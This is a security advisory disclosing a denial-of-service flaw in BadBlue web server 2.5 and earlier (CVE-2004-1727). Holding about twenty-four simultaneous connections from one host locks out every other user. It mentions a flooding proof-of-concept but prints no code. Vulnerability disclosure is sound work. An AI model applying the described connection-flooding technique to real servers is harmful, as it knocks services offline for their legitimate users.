BadBlue Denial Of Service
Vendor: BadBlue
Product: BadBlue
Version: <= 2.5
Website: http://www.badblue.com
BID: 10983
CVE: CVE-2004-1727
OSVDB: 9107
SECUNIA: 12346
PACKETSTORM: 34103
Description:
Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site) BadBlue shares files directly from your own PC, using the cable /DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file-sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on.

Denial Of Service Vulnerability:
BadBlue Webserver cannot handle multiple connections from the same host, and will deny all acess to any users at right around twenty four simultaneous connections. I have included a proof of concept that floods the target server with a number of connections, and then basically keeps those connections up for as long as you specify, thus blocking all other traffic to the affected server.

Proof of Concept:
BadBlue Webserver Denial of Service POC Code

Solution:
The development team has been contacted and said they will be looking into this issue shortly. Users are advised to upgrade as soon as possible.

Credits:
James Bercegay of the GulfTech Security Research Team.